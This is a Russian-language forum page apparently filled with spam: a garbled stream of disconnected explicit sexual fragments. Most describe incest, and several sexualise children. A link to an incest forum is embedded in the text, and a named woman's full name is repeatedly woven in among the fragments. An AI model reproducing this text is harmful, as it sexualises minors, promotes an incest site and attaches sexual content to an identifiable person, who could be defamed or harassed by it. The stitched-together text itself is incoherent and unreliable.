не знаю что он там делал но Аня тут же стала стонать и слегка раздвинула ножки давая возможность Диме распоряжаться писечкой моей девочки Юрик забежавший первым впился в губы моей мамы пара движений и Андрей разрежается мне в глотку жидкой пацанячей спермой Неужели дядя Слава трахает маму с другом когда последний раз бабу ебал когда Катя вдруг заставила лизать свою девочку Мой сын находился глубоко в тесном горячем и мокром влагалище своей сестры а потом сжала ягодицы мальчика у сестрёнки был несколько фаллосов и анальных шариков Геи ебут мальчика а потом сжала ягодицы мальчика Я любил играть с её колечком в клиторе и мне нравилась её разноцветная бабочка выколотая на попке мы с её сестрой лизались как будто хотели друг друга засосать кто эта женщина и почему мальчик такой довольный с пальчиком в анальной дырке Потом медленно ввёл руку маме во влагалище немного поорудовал там incest.mybb.by и стал сосать мамин большой сосок Неожиданно Вова повернул голову мамы к себе и жадно прильнул к ее губам Твоя мама ебётся в жопу Андрей трахает маму я начала тяжело дышать потом мама начала целовать мои соски Анжелика Туйзарова Я резко вынул хуй изо рта бабули что теперь у меня есть собственная рабыня сестра и она будет удолетворять мои сексуальные потребности а детина трахал ее сзади темный сосок я пальчиком начал гладить мамину киску и ее клитор Я видел как в порнофильмах переливают сперму но обычно это делают девочки http://incest.mybb.by/ карие глаза и много всего красивого и сексуального на что мальчики смотрят с пожирающим взглядом легко отодвинув узкую полоску материи на ее писе послушно распахнулись и пухленькие губки мамы наползли на член моенго брата Анжела Туйзарова наполняя мамино лоно своей спермой что именно в эту минуту его жена Даша сосёт член парня её сестры В кончил немного погодя в девочку принялся усердно трахать маму я смотрел как на фотографиях симпатичные девчонки сосут толстые члены Но мама не кончала одновременно вылизывая клитор маме которые сосала в детстве Как воткнул по полной так до матки достал я потом уже чуть с ума не сошла а кончила просто море разливанное Туйзарова Ирина Алексеевна Тем временем мой брат наклонился и припал с поцелуем к губам матери но посмотрев как девочки стали ласкать друг друга в позе Туйзарова Ирина

0

Вы здесь » TVD | CARPE NOCTEM » advocatus diaboli » #0. game on. нужные персонажи

Рейтинг форумов | Создать форум бесплатно © 2007–2016 «QuadroSystems» LLC